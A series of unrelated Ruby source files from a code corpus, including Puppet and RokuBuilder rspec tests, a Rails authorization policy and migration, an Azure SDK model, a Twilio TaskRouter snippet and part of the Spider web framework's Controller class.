'path' => '/etc/httpd/conf.d/passenger.conf',
}) }
it { is_expected.to contain_file('passenger_package.conf').without_content }
it { is_expected.to contain_file('passenger_package.conf').without_source }
it { is_expected.to contain_file('zpassenger.load').with({
'path' => '/etc/httpd/conf.d/zpassenger.load',
}) }
it { is_expected.to contain_file('passenger.conf').without_content(/PassengerRoot/) }
it { is_expected.to contain_file('passenger.conf').without_content(/PassengerRuby/) }
describe "with passenger_root => '/usr/lib/example'" do
let :params do
{ :passenger_root => '/usr/lib/example' }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ PassengerRoot "\/usr\/lib\/example"$/) }
end
describe "with passenger_ruby => /usr/lib/example/ruby" do
let :params do
{ :passenger_ruby => '/usr/lib/example/ruby' }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ PassengerRuby "\/usr\/lib\/example\/ruby"$/) }
end
end
context "on a FreeBSD OS" do
let :facts do
{
:osfamily => 'FreeBSD',
:operatingsystemrelease => '9',
:concat_basedir => '/dne',
:operatingsystem => 'FreeBSD',
:id => 'root',
:kernel => 'FreeBSD',
:path => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin',
:is_pe => false,
}
end
it { is_expected.to contain_class("apache::params") }
it { is_expected.to contain_apache__mod('zpassenger') }
it { is_expected.to contain_package("www/rubygem-passenger") }
end
context "on a Gentoo OS" do
let :facts do
{
:osfamily => 'Gentoo',
:operatingsystem => 'Gentoo',
:operatingsystemrelease => '3.16.1-gentoo',
:concat_basedir => '/dne',
:id => 'root',
:kernel => 'Linux',
:path => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin',
:is_pe => false,
}
end
it { is_expected.to contain_class("apache::params") }
it { is_expected.to contain_apache__mod('zpassenger') }
it { is_expected.to contain_package("www-apache/passenger") }
end
end
| 42.429577 | 150 | 0.568133 |
33a028a4c27e44b5e83c021c6505d149569b8cfd | 1,810 | class NavigationPolicy
attr_accessor :user, :navigation
def initialize(user, navigation)
@user = user
@navigation = navigation
add_dynamic_methods
ensure_admin
end
def registered?
! user.nil?
end
def allow_local_signup?
NavigationPolicy.configured_for_local_signup?
end
def self.allow_local_signup(controller)
controller.authorize(:navigation, :allow_local_signup?)
end
def add_dynamic_methods
Roles::ALL_ROLES.each do |role|
self.define_singleton_method("#{role}?".to_sym) do
user.has_role?(role)
end
end
Roles::COMPOSITE_ROLES.each_pair do |method_name, role_array|
self.define_singleton_method("#{method_name}?".to_sym) do
return false unless registered?
(@user.roles.map(&:name) & role_array).length != 0
end
end
end
def ensure_admin
return false unless registered?
# promote the first user to an admin
if User.count == 1 && user.is_a?(User) && !user.has_role?(Roles::SUPER_USER)
user.add_role(Roles::SUPER_USER)
user.save
end
end
def self.add_action_methods(on)
#on is a controller
#dynamically add authorization methods
(Roles::ALL_ROLES + Roles::COMPOSITE_ROLES.keys).each do |role|
method = "#{role}".to_sym
method_q = "#{role}?".to_sym
on.define_singleton_method(method) do
authorize(:navigation, method_q)
end
on.define_singleton_method(method_q) do
authorize(:navigation, method_q) rescue false
end
end
end
private
def self.configured_for_local_signup?
exclude_envs = ($PROPS['PRISME.disallow_local_signups_on']).split(',').map(&:strip) rescue []
!exclude_envs.include?(PRISME_ENVIRONMENT)
end
end
=begin
load('./app/policies/navigation_policy.rb')
=end | 24.459459 | 97 | 0.687293 |
e20cee13bfa20933352decc7fd674d06585c6eb1 | 986 | class FixLineDirections < ActiveRecord::Migration[5.2]
def change
flushingn = ExpressLineDirection.joins(:line).find_by(lines: {name: "Flushing"}, direction: 1)
flushingn.last_branch_stop = "701N" # Flushing–Main St
flushingn.last_alternate_branch_stop = "702N" # Mets–Willets Pt
flushingn.save!
flushings = ExpressLineDirection.joins(:line).find_by(lines: {name: "Flushing"}, direction: 3)
flushings.first_branch_stop = "701S" # Flushing–Main St
flushings.first_alternate_branch_stop = "702S" # Mets–Willets Pt
flushings.save!
jamaican = LineDirection.joins(:line).find_by(lines: {name: "Jamaica (Myrtle Avenue—Crescent Street)"}, direction: 1)
jamaican.first_alternate_branch_stop = "J27N" # Broadway Jct
jamaican.save!
jamaicas = LineDirection.joins(:line).find_by(lines: {name: "Jamaica (Myrtle Avenue—Crescent Street)"}, direction: 3)
jamaicas.last_alternate_branch_stop = "J27S" # Broadway Jct
jamaicas.save!
end
end
| 44.818182 | 121 | 0.733266 |
03ca73f257ada535e7b1e9bbfd3dc855eea7d16e | 1,569 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Compute::Mgmt::V2019_07_01
module Models
#
# The List Virtual Machine operation response.
#
class VirtualMachineSizeListResult
include MsRestAzure
# @return [Array<VirtualMachineSize>] The list of virtual machine sizes.
attr_accessor :value
#
# Mapper for VirtualMachineSizeListResult class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'VirtualMachineSizeListResult',
type: {
name: 'Composite',
class_name: 'VirtualMachineSizeListResult',
model_properties: {
value: {
client_side_validation: true,
required: false,
serialized_name: 'value',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'VirtualMachineSizeElementType',
type: {
name: 'Composite',
class_name: 'VirtualMachineSize'
}
}
}
}
}
}
}
end
end
end
end
| 28.017857 | 78 | 0.525175 |
0320f819dcddba4469f8ed25e6e5f29f8cc66860 | 10,576 | # ********** Copyright Viacom, Inc. Apache 2.0 **********
require_relative "../test_helper.rb"
module RokuBuilder
class PackagerTest < Minitest::Test
def setup
Logger.set_testing
RokuBuilder.class_variable_set(:@@dev, false)
RokuBuilder.setup_plugins
register_plugins(Packager)
@requests = []
end
def teardown
@requests.each {|req| remove_request_stub(req)}
end
def test_packager_parse_options_long
parser = OptionParser.new
options = {}
Packager.parse_options(parser: parser, options: options)
argv = ["roku", "--package", "--key", "--genkey", "--inspect-package"]
parser.parse! argv
assert options[:package]
assert options[:key]
assert options[:genkey]
assert options[:inspect_package]
end
def test_scripter_parse_options_short
parser = OptionParser.new
options = {}
Packager.parse_options(parser: parser, options: options)
argv = ["roku", "-p", "-k", "-i"]
parser.parse! argv
assert options[:package]
assert options[:key]
assert options[:inspect_package]
end
def test_packager_current
config, options = [nil, nil]
Pathname.stub(:pwd, test_files_path(PackagerTest)) do
config, options = build_config_options_objects(PackagerTest, {package: true, current: true}, false)
end
packager = Packager.new(config: config)
assert_raises InvalidOptions do
packager.package(options: options)
end
end
def test_packager_in
config, options = build_config_options_objects(PackagerTest, {package: true, in: "/tmp/test.pkg"}, false)
packager = Packager.new(config: config)
assert_raises InvalidOptions do
packager.package(options: options)
end
end
def test_packager_ref
config, options = build_config_options_objects(PackagerTest, {package: true, ref: "test_ref"}, false)
packager = Packager.new(config: config)
assert_raises InvalidOptions do
packager.package(options: options)
end
end
def test_packager_package_failed
config, options = build_config_options_objects(PackagerTest, {package: true, stage: "production"}, false)
@requests.push(stub_request(:post, "http://192.168.0.100:8060/keypress/Home").
to_return(status: 200, body: "", headers: {}))
@requests.push(stub_request(:post, "http://192.168.0.100/plugin_install").
to_return(status: 200, body: "", headers: {}))
@requests.push(stub_request(:post, "http://192.168.0.100/plugin_package").
to_return(status: 200, body: "Failed: Error.", headers: {}))
packager = Packager.new(config: config)
assert_raises ExecutionError do
packager.package(options: options)
end
end
def test_packager_package
loader = Minitest::Mock.new
inspector = Minitest::Mock.new
io = Minitest::Mock.new
logger = Minitest::Mock.new
config, options = build_config_options_objects(PackagerTest, {package: true, stage: "production", inspect_package: true, verbose: true}, false)
@requests.push(stub_request(:post, "http://192.168.0.100/plugin_inspect").
to_return(status: 200, body: "", headers: {}).times(2))
body = "<a href=\"pkgs\">pkg_url</a>"
@requests.push(stub_request(:post, "http://192.168.0.100/plugin_package").
to_return(status: 200, body: body, headers: {}).times(2))
body = "package_body"
@requests.push(stub_request(:get, "http://192.168.0.100/pkgs/pkg_url").
to_return(status: 200, body: body, headers: {}))
loader.expect(:sideload, nil, [Hash])
io.expect(:write, nil, ["package_body"])
inspector.expect(:inspect, nil, [Hash])
logger.expect(:debug, nil, [String])
io.expect(:each_line, nil)
logger.expect(:info, nil) do |message|
assert_match(/#{tmp_folder}/, message)
end
Logger.class_variable_set(:@@instance, logger)
packager = Packager.new(config: config)
dev_id = Proc.new {"#{Random.rand(999999999999)}"}
Loader.stub(:new, loader) do
Time.stub(:now, Time.at(0)) do
File.stub(:open, nil, io) do
Inspector.stub(:new, inspector) do
packager.stub(:dev_id, dev_id) do
packager.package(options: options)
end
end
end
end
end
io.verify
loader.verify
inspector.verify
logger.verify
end
def test_packager_package_squash
loader = Minitest::Mock.new
inspector = Minitest::Mock.new
io = Minitest::Mock.new
logger = Minitest::Mock.new
config = good_config(PackagerTest)
config[:projects][:project1][:stages][:production][:squash] = true
config, options = build_config_options_objects(PackagerTest, {package: true, stage: "production", inspect_package: true, verbose: true}, false, config)
@requests.push(stub_request(:post, "http://192.168.0.100/plugin_inspect").
to_return(status: 200, body: "", headers: {}).times(2))
body = "<a href=\"pkgs\">pkg_url</a>"
@requests.push(stub_request(:post, "http://192.168.0.100/plugin_package").
to_return(status: 200, body: body, headers: {}).times(2))
body = "package_body"
@requests.push(stub_request(:get, "http://192.168.0.100/pkgs/pkg_url").
to_return(status: 200, body: body, headers: {}))
loader.expect(:sideload, nil, [Hash])
loader.expect(:squash, nil, [Hash])
io.expect(:write, nil, ["package_body"])
inspector.expect(:inspect, nil, [Hash])
logger.expect(:debug, nil, [String])
io.expect(:each_line, nil)
logger.expect(:info, nil) do |message|
assert_match(/#{tmp_folder}/, message)
end
Logger.class_variable_set(:@@instance, logger)
packager = Packager.new(config: config)
dev_id = Proc.new {"#{Random.rand(999999999999)}"}
Loader.stub(:new, loader) do
Time.stub(:now, Time.at(0)) do
File.stub(:open, nil, io) do
Inspector.stub(:new, inspector) do
packager.stub(:dev_id, dev_id) do
packager.package(options: options)
end
end
end
end
end
io.verify
loader.verify
inspector.verify
logger.verify
end
def test_packager_dev_id
body = "v class=\"roku-font-5\"><label>Your Dev ID: </label> dev_id<hr></div>"
@requests.push(stub_request(:get, "http://192.168.0.100/plugin_package").
to_return(status: 200, body: body, headers: {}))
config = build_config_options_objects(PackagerTest, {key: true, stage: "production"}, false)[0]
packager = Packager.new(config: config)
dev_id = packager.dev_id
assert_equal "dev_id", dev_id
end
def test_packager_dev_id_old_interface
body = "<p> Your Dev ID: <font face=\"Courier\">dev_id</font> </p>"
@requests.push(stub_request(:get, "http://192.168.0.100/plugin_package").
to_return(status: 200, body: body, headers: {}))
config = build_config_options_objects(PackagerTest, {key: true, stage: "production"}, false)[0]
packager = Packager.new(config: config)
dev_id = packager.dev_id
assert_equal "dev_id", dev_id
end
def test_packager_key_changed
@requests.push(stub_request(:post, "http://192.168.0.100/plugin_inspect").
to_return(status: 200, body: "", headers: {}))
logger = Minitest::Mock.new
logger.expect(:debug, nil) {|s| s =~ /\d* -> \d*/}
dev_id = Proc.new {"#{Random.rand(999999999999)}"}
config, options = build_config_options_objects(PackagerTest, {key: true, stage: "production"}, false)
packager = Packager.new(config: config)
Logger.class_variable_set(:@@instance, logger)
packager.stub(:dev_id, dev_id) do
packager.key(options: options)
end
end
def test_packager_key_same
@requests.push(stub_request(:post, "http://192.168.0.100/plugin_inspect").
to_return(status: 200, body: "", headers: {}))
logger = Minitest::Mock.new
logger.expect(:info, nil) {|s| s =~ /did not change/}
logger.expect(:debug, nil) {|s| s =~ /\d* -> \d*/}
dev_id = Proc.new {"#{Random.rand(999999999999)}"}
config, options = build_config_options_objects(PackagerTest, {key: true, stage: "production"}, false)
packager = Packager.new(config: config)
Logger.class_variable_set(:@@instance, logger)
packager.stub(:dev_id, dev_id) do
packager.key(options: options)
end
end
def test_packager_generate_new_key
connection = Minitest::Mock.new()
connection.expect(:puts, nil, ["genkey"])
connection.expect(:waitfor, nil) do |config, &blk|
assert_equal(/./, config['Match'])
assert_equal(false, config['Timeout'])
txt = "Password: password\nDevID: devid\n"
blk.call(txt)
true
end
connection.expect(:close, nil, [])
config = build_config_options_objects(PackagerTest, {genkey: true}, false)[0]
packager = Packager.new(config: config)
Net::Telnet.stub(:new, connection) do
packager.send(:generate_new_key)
end
end
def test_packager_no_key
config = good_config(PackagerTest)
config[:projects][:project1][:stages][:production].delete(:key)
config, options = build_config_options_objects(PackagerTest, {key: true, stage: "production"}, false, config)
packager = Packager.new(config: config)
dev_id = Proc.new {"#{Random.rand(999999999999)}"}
assert_raises ExecutionError do
packager.stub(:dev_id, dev_id) do
packager.key(options: options)
end
end
end
def test_packager_genkey
loader = Minitest::Mock.new
loader.expect(:sideload, nil, [Hash])
body = "<a href=\"pkgs\">pkg_url</a>"
@requests.push(stub_request(:post, "http://192.168.0.100/plugin_package").
to_return(status: 200, body: body, headers: {}))
@requests.push(stub_request(:get, "http://192.168.0.100/pkgs/pkg_url").
to_return(status: 200, body: "", headers: {}))
config, options = build_config_options_objects(PackagerTest, {genkey: true}, false)
packager = Packager.new(config: config)
Loader.stub(:new, loader) do
packager.stub(:generate_new_key, ["password", "dev_id"]) do
packager.genkey(options: options)
end
end
loader.verify
end
end
end
| 38.739927 | 157 | 0.635401 |
d51bc0007b8c21f3db9624ecf8620cb7acdcfe7a | 2,251 | # Tests in this file ensure that:
#
# * plugin controller actions are found
# * actions defined in application controllers take precedence over those in plugins
# * actions in controllers in subsequently loaded plugins take precendence over those in previously loaded plugins
# * this works for actions in namespaced controllers accordingly
require File.dirname(__FILE__) + '/../test_helper'
class ControllerLoadingTest < ActionController::TestCase
def setup
@request = ActionController::TestRequest.new
@response = ActionController::TestResponse.new
end
# plugin controller actions should be found
def test_WITH_an_action_defined_only_in_a_plugin_IT_should_use_this_action
get_action_on_controller :an_action, :alpha_plugin
assert_response_body 'rendered in AlphaPluginController#an_action'
end
def test_WITH_an_action_defined_only_in_a_namespaced_plugin_controller_IT_should_use_this_action
get_action_on_controller :an_action, :alpha_plugin, :namespace
assert_response_body 'rendered in Namespace::AlphaPluginController#an_action'
end
# app takes precedence over plugins
def test_WITH_an_action_defined_in_both_app_and_plugin_IT_should_use_the_one_in_app
get_action_on_controller :an_action, :app_and_plugin
assert_response_body 'rendered in AppAndPluginController#an_action (from app)'
end
def test_WITH_an_action_defined_in_namespaced_controllers_in_both_app_and_plugin_IT_should_use_the_one_in_app
get_action_on_controller :an_action, :app_and_plugin, :namespace
assert_response_body 'rendered in Namespace::AppAndPluginController#an_action (from app)'
end
# subsequently loaded plugins take precendence over previously loaded plugins
def test_WITH_an_action_defined_in_two_plugin_controllers_IT_should_use_the_latter_of_both
get_action_on_controller :an_action, :shared_plugin
assert_response_body 'rendered in SharedPluginController#an_action (from beta_plugin)'
end
def test_WITH_an_action_defined_in_two_namespaced_plugin_controllers_IT_should_use_the_latter_of_both
get_action_on_controller :an_action, :shared_plugin, :namespace
assert_response_body 'rendered in Namespace::SharedPluginController#an_action (from beta_plugin)'
end
end
| 43.288462 | 114 | 0.838294 |
7911e741a541b129a14e46e8af379c988f534744 | 893 | # Get twilio-ruby from twilio.com/docs/ruby/install
require 'rubygems' # This line not needed for ruby > 1.8
require 'twilio-ruby'
# Get your Account Sid and Auth Token from twilio.com/user/account
account_sid = 'ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
auth_token = 'your_auth_token'
workspace_sid = 'WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
task_sid = 'WTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
reservation_sid = 'WRXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
client = Twilio::REST::TaskRouterClient.new account_sid,
auth_token,
workspace_sid
reservation = client.workspace
.tasks.get(task_sid)
.reservations.get(reservation_sid)
reservation.update(instruction: 'dequeue', dequeueFrom: '+18001231234')
puts reservation.reservation_status
puts reservation.worker_name
| 38.826087 | 71 | 0.690929 |
ab14c23360ce7b15d471f6b1fd59389e26968a2a | 175 | class AddSelectionProcessToEvents < ActiveRecord::Migration[5.1]
def change
add_column :events, :selection_by_organizer, :boolean, default: false, null: false
end
end
| 29.166667 | 86 | 0.777143 |
b9ec8621e99ea99fac16416879e5d3b7d4e49288 | 1,357 | module StripeClerk
module ChargesHelper
# determine if the given user has ordered by card and if so return the charge
# given user may be nil, in which case nil is returned (save caller checking)
# nil is also returned if no stripe order was placed
# from the returned charge one may get the card (to display last4) or
# the customer to create a new charge (with the charge_customer method)
def has_charge user
return nil unless user
order = Order.where(email: user.email).where(payment_type: :stripe).order(:ordered_on).last
return nil unless order
Stripe::Charge.retrieve(order.payment_info)
end
# reusable helper to charge given customer_id for given order
# orders save the charge_id, so customers may be re-charged using that
# (has_charge helper will return the latest charge for a user and .customer will give it's id)
# Throws any StripeError , specifically CardError
#
def charge_customer customer_id , order
charge = Stripe::Charge.create(
:customer => customer_id,
:amount => (order.total_price*100).to_i,
:description => t(:order) + " : " + order.number ,
:currency => 'eur'
)
order.pay_now
order.payment_info = charge.id
order.payment_type = "stripe"
order.save
end
end
end
| 36.675676 | 98 | 0.676492 |
877cb6e21f237d1b97a895605612165bf51ba293 | 1,372 | #coding: utf-8
$:.unshift File.expand_path("../lib", __FILE__)
require 'server_scripts/version.rb'
def self.get_files
files = []
['ext', 'lib', 'spec'].each do |folder|
files.concat Dir.glob "#{folder}/**/*"
end
files.concat(
["Gemfile", "server_scripts.gemspec", "README.md", "Rakefile"])
files
end
files = get_files
ServerScripts::DESCRIPTION = <<MSG
Easily write scripts for submitted jobs to various machines.
MSG
Gem::Specification.new do |spec|
spec.name = 'server_scripts'
spec.version = ServerScripts::VERSION
spec.authors = ['Sameer Deshmukh']
spec.email = ['[email protected]']
spec.summary = %q{Easily write scripts for submitted jobs to various machines.}
spec.description = ServerScripts::DESCRIPTION
spec.homepage = "https://github.com/v0dro/server-scripts"
spec.license = 'BSD-3 Clause'
spec.files = files
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.bindir = "bin"
spec.executables << "mem_monitor"
spec.add_runtime_dependency 'ptools'
spec.add_development_dependency 'minitest', '~> 5.11'
spec.add_development_dependency 'minitest-hooks'
spec.add_development_dependency 'minitest-fail-fast'
end
| 29.826087 | 87 | 0.6793 |
7a295c24a4ca14d6096b1fe505fbaa47535b1e18 | 199 | class Twig
module Util
def self.numeric?(value)
!!Float(value) rescue false
end
def self.truthy?(value)
%w[true yes y on 1].include?(value.to_s.downcase)
end
end
end
| 16.583333 | 55 | 0.628141 |
3388e9ae9c036fa7bb9e9de350987c68335dd675 | 2,167 | require "#{File.join(File.dirname(__FILE__),'..','spec_helper.rb')}"
describe 'url_parse' do
describe 'Test Url Components parsing' do
it 'should return correct scheme' do
should run.with_params('ftp://www.example.com/test','scheme').and_return('ftp')
end
it 'should return correct userinfo' do
should run.with_params('https://my_user:[email protected]:8080/path/to/file.php?id=1&ret=0','userinfo').and_return('my_user:my_pass')
end
it 'should return correct user' do
should run.with_params('https://my_user:[email protected]:8080/path/to/file.php?id=1&ret=0','user').and_return('my_user')
end
it 'should return correct password' do
should run.with_params('https://my_user:[email protected]:8080/path/to/file.php?id=1&ret=0','password').and_return('my_pass')
end
it 'should return correct host' do
should run.with_params('https://my_user:[email protected]:8080/path/to/file.php?id=1&ret=0','host').and_return('www.example.com')
end
it 'should return correct port' do
should run.with_params('https://my_user:[email protected]:8080/path/to/file.php?id=1&ret=0','port').and_return(8080)
end
it 'should return correct path' do
should run.with_params('https://my_user:[email protected]:8080/path/to/file.php?id=1&ret=0','path').and_return('/path/to/file.php')
end
it 'should return correct query' do
should run.with_params('https://my_user:[email protected]:8080/path/to/file.php?id=1&ret=0','query').and_return('id=1&ret=0')
end
it 'should return correct filename' do
should run.with_params('https://my_user:[email protected]:8080/path/to/file.php?id=1&ret=0','filename').and_return('file.php')
end
it 'should return correct filetype' do
should run.with_params('https://my_user:[email protected]:8080/path/to/file.php?id=1&ret=0','filetype').and_return('.php')
end
it 'should return correct filedir' do
should run.with_params('https://my_user:[email protected]:8080/path/to/file.php?id=1&ret=0','filedir').and_return('file')
end
end
end
| 49.25 | 146 | 0.699585 |
3824354bdba290b5d99a75f15f1d5eade4138e38 | 809 | require_relative "jekyll-open-sdg-plugins/version"
require_relative "jekyll-open-sdg-plugins/site_configuration"
require_relative "jekyll-open-sdg-plugins/validate_site_config"
require_relative "jekyll-open-sdg-plugins/fetch_remote_data"
require_relative "jekyll-open-sdg-plugins/translate_key"
require_relative "jekyll-open-sdg-plugins/translate_date"
require_relative "jekyll-open-sdg-plugins/translate_metadata_field"
require_relative "jekyll-open-sdg-plugins/create_indicators"
require_relative "jekyll-open-sdg-plugins/create_goals"
require_relative "jekyll-open-sdg-plugins/create_pages"
require_relative "jekyll-open-sdg-plugins/sdg_variables"
require_relative "jekyll-open-sdg-plugins/search_index"
require_relative "jekyll-open-sdg-plugins/validate_indicator_config"
module JekyllOpenSdgPlugins
end
| 47.588235 | 68 | 0.866502 |
26fe4583e5fa8ba8410137b48691094309944312 | 1,526 | # frozen_string_literal: true
require_relative "component/composable"
require_relative "component/intersection"
module Same
# This module should be included in every component in your application.
#
# Components are data holders. Each component class defines a small set of data that it holds. Then entities can
# have instance of components attached to them.
#
# Ideally components should contain only several fields. Remember
# entities as many types of components as they need, so small components help keep things flexible.
#
# Components shouldn't include any business logic. Any methods defined in a component should be there only to allow
# different types of accessing data.
#
# Sometimes components might not have any additional data, mere presence of a component on an entity can indicate
# some behavior (e.g. +Killable+ component which indicates that entity can be killed).
#
# Example component:
# class Motion
# include Same::Component
# attr_reader :speed
#
# def initialize(speed)
# @speed = speed
# end
# end
#
# entity.add Motion, 10
module Component
extend ActiveSupport::Concern
included do
@identifier = name.underscore.tr("/", "_")
singleton_class.attr_reader :identifier
Same::Entity.attr_reader @identifier
end
# Class methods for {Component}.
module ClassMethods
include Composable
def entities(store)
store[self]
end
end
end
end
| 29.921569 | 117 | 0.700524 |
6a3e68c6b4655f61462d1f040be9f9c640e704ab | 264 | require "merb-core"
require "merb-mailer/mailer"
require "merb-mailer/mail_controller"
require "merb-mailer/mailer_mixin"
Merb::Controller.send(:include, Merb::MailerMixin)
Merb.add_generators(File.join(File.dirname(__FILE__), 'generators', 'mailer_generator'))
| 29.333333 | 88 | 0.795455 |
ed745eb11bae2b3a1acb684f0036f39a34717344 | 165 | def task367(n)
a = [1..3]
b = [1..3, 1..3]
for i in n..3
for j in n..3
b[i, j] = a[i] - 3 * a[j]
puts(b[i, j])
end
end
end
task367(33)
| 11.785714 | 31 | 0.412121 |
e869364c5be21daf5771c9499f3e8dcbd88c1fd6 | 2,684 | # typed: ignore
require 'datadog/tracing/contrib/rails/rails_helper'
require 'datadog/tracing/contrib/rails/framework'
require 'datadog/tracing/contrib/rails/middlewares'
require 'datadog/tracing/contrib/rack/middlewares'
RSpec.describe 'Rails Railtie' do
before { skip 'Test not compatible with Rails < 4.0' if Rails.version < '4.0' }
include_context 'Rails test application'
let(:routes) { { '/' => 'test#index' } }
let(:rails_options) { {} }
let(:controllers) { [controller] }
let(:controller) do
stub_const('TestController', Class.new(ActionController::Base) do
def index
head :ok
end
end)
end
RSpec::Matchers.define :have_kind_of_middleware do |expected|
match do |actual|
found = 0
while actual
found += 1 if actual.class <= expected
without_warnings { actual = actual.instance_variable_get(:@app) }
end
found == (count || 1)
end
chain :once do
@count = 1
end
chain :copies, :count
end
before do
Datadog.configure do |c|
c.tracing.instrument :rails, rails_options
end
end
describe 'with Rails integration #middleware option' do
context 'set to true' do
let(:rails_options) { super().merge(middleware: true) }
it { expect(app).to have_kind_of_middleware(Datadog::Tracing::Contrib::Rack::TraceMiddleware).once }
it { expect(app).to have_kind_of_middleware(Datadog::Tracing::Contrib::Rails::ExceptionMiddleware).once }
end
context 'set to false' do
let(:rails_options) { super().merge(middleware: false) }
after { Datadog.configuration[:rails][:middleware] = true }
it { expect(app).to_not have_kind_of_middleware(Datadog::Tracing::Contrib::Rack::TraceMiddleware) }
it { expect(app).to_not have_kind_of_middleware(Datadog::Tracing::Contrib::Rails::ExceptionMiddleware) }
end
end
describe 'when load hooks run twice' do
subject! do
# Set expectations
expect(Datadog::Tracing::Contrib::Rails::Patcher).to receive(:add_middleware)
.with(a_kind_of(Rails::Application))
.once
.and_call_original
without_warnings do
# Then load the app, which run load hooks
app
# Then manually re-run load hooks
ActiveSupport.run_load_hooks(:before_initialize, app)
ActiveSupport.run_load_hooks(:after_initialize, app)
end
end
it 'only includes the middleware once' do
expect(app).to have_kind_of_middleware(Datadog::Tracing::Contrib::Rack::TraceMiddleware).once
expect(app).to have_kind_of_middleware(Datadog::Tracing::Contrib::Rails::ExceptionMiddleware).once
end
end
end
| 30.157303 | 111 | 0.682191 |
87d9f5cdf8ecd29ce1a9799d0ae71d8056cdde22 | 20,037 | require 'spiderfw/controller/controller_io'
require 'spiderfw/controller/request'
require 'spiderfw/controller/response'
require 'spiderfw/controller/scene'
require 'spiderfw/controller/controller_exceptions'
require 'spiderfw/controller/first_responder'
require 'spiderfw/controller/controller_mixin'
require 'spiderfw/controller/mixins/visual'
require 'spiderfw/controller/mixins/http_mixin'
require 'spiderfw/controller/mixins/static_content'
require 'spiderfw/controller/helpers/widget_helper'
require 'spiderfw/utils/annotations'
module Spider
class Controller
include App::AppClass
include Dispatcher
include Logger
include ControllerMixins
include Helpers
include Annotations
class << self
def default_action
'index'
end
# @return [String] Path to this controller's templates
def template_path
return nil unless self.app
return File.join(self.app.path, '/views')
end
# @return [String] Path to this controller's layouts
def layout_path
return nil unless self.app
return File.join(self.app.path, '/views')
end
# Defines a method that will be called before the controller's before,
# if the action matches the given conditions.
# Example:
# before(/^list_/, :before_lists)
# will call the method before_lists if the action starts with 'list_'
# @param [String|Regexp|Proc|Symbol|Array] conditions what will be checked against the action
# @param [Symbol] method The method to be called if the conditions match.
# @param [Hash] params may contain :unless => true: in this case,
# the conditions will be inverted, that is, the method will
# be executed unless the conditions match.
# @return [void]
def before(conditions, method, params={})
@dispatch_methods ||= {}
@dispatch_methods[:before] ||= []
@dispatch_methods[:before] << [conditions, method, params]
end
# Like {Controller.before}, but calls the method unless the conditions match
# @param [String|Regexp|Proc|Symbol|Array] conditions what will be checked against the action
# @param [Symbol] method The method to be called if the conditions match.
# @param [Hash] params may contain :unless => true: in this case,
# the conditions will be inverted, that is, the method will
# be executed unless the conditions match.
# @return [void]
def before_unless(condition, method, params={})
@dispatch_methods ||= {}
@dispatch_methods[:before] ||= []
params[:unless] = true
@dispatch_methods[:before] << [condition, method, params]
end
# @return [Array] An array of methods defined with {Controller.before}
def before_methods
@dispatch_methods && @dispatch_methods[:before] ? @dispatch_methods[:before] : []
end
# Registers a list of methods as controller actions, that is, methods that can
# be dispatched to.
#
# This method is not usually called directly; using the __.action annotation,
# or one of the format annotations (__.html, __.xml, __.json, __.text), will
# make a method a controller action.
# @param [*Symbol] A list of methods
# @return [Array] All defined controller actions
def controller_actions(*methods)
if (methods.length > 0)
@controller_actions ||= []
@controller_actions += methods
end
@controller_actions
end
def controller_action(method, params)
@controller_actions ||= []
@controller_actions << method
@controller_action_params ||= {}
@controller_action_params[method] = params
end
# @return [bool] true if the method is a controller action
def controller_action?(method)
return false unless self.method_defined?(method)
return true if default_action && method == default_action.to_sym
if @controller_actions
res = @controller_actions.include?(method)
if (!res)
Spider.logger.info("Method #{method} is not a controller action for #{self}")
end
return res
else
return true
end
end
# Finds a resource in the context of the controller's app
# See {Spider.find_resource}
# @param [Symbol] resource_type
# @param [String] path
# @param [String] cur_path Current path: if set, will be used to resolve relative paths
# @return [Resource]
def find_resource(type, name, cur_path=nil)
Spider.find_resource(type, name, cur_path, self)
end
# Returns the path of a resource, or nil if none is found
# See {Controller.find_resource}
# @param [Symbol] resource_type
# @param [String] path
# @param [String] cur_path Current path: if set, will be used to resolve relative paths
# @return [Resource]
def find_resource_path(type, name, cur_path=nil)
res = Spider.find_resource(type, name, cur_path, self)
return res ? res.path : nil
end
# @param [String] action Additional action to get path for
# @return [String] The canonical URL path for this controller
def route_path(action=nil)
u = @default_route || ''
u += "/#{action}" if action
if @default_dispatcher && @default_dispatcher != self
u = @default_dispatcher.route_path(u)
elsif self.app
u = self.app.route_path(u)
end
u
end
# Returns the full URL for the Controller
# The Controller's implementation returns the route_path.
#
# However, the HTTPMixin will override this method to return a full http url;
# other mixins can override the method in different ways.
# @param [String] action Additional action to get path for
# @return [String] The canonical URL for this controller
def url(action=nil)
route_path(action)
end
alias :route_url :url
end
define_annotation(:action) { |k, m, params| k.controller_action(m, params) }
# @return [Spider::Request]
attr_reader :request
# @return [Spider::Response]
attr_reader :response
# @return [Symbol] The method currently set to be executed, if any
attr_reader :executed_method
# @return [Scene]
attr_reader :scene
# @return [String] Action used to reach this controller in the dispatch chain
attr_accessor :dispatch_action
# @return [bool] True if the controller is the target of the current action
attr_accessor :is_target
# Constructor. Note: you can use the {Controller#init} method for custom
# initialization, instead of overrideing this method
# @param [Spider::Request] request
# @param [Spider::Response] response
# @param [scene]
def initialize(request, response, scene=nil)
@request = request
@response = response
@scene = scene || get_scene
@dispatch_path = ''
@is_target = true
init
end
# Override this for controller initialization
# @return [void]
def init
end
# @return [String]
def inspect
self.class.to_s
end
# @return [String] The actual action path used to reach this Controller
def request_path
act = @dispatch_action || ''
if (@dispatch_previous)
prev = @dispatch_previous.call_path
act = prev+'/'+act unless prev.empty?
end
return ('/'+act).gsub(/\/+/, '/').sub(/\/$/, '')
end
alias :call_path :request_path
# Returns the method to call on the controller given an action, and the arguments
# that should be passed to it.
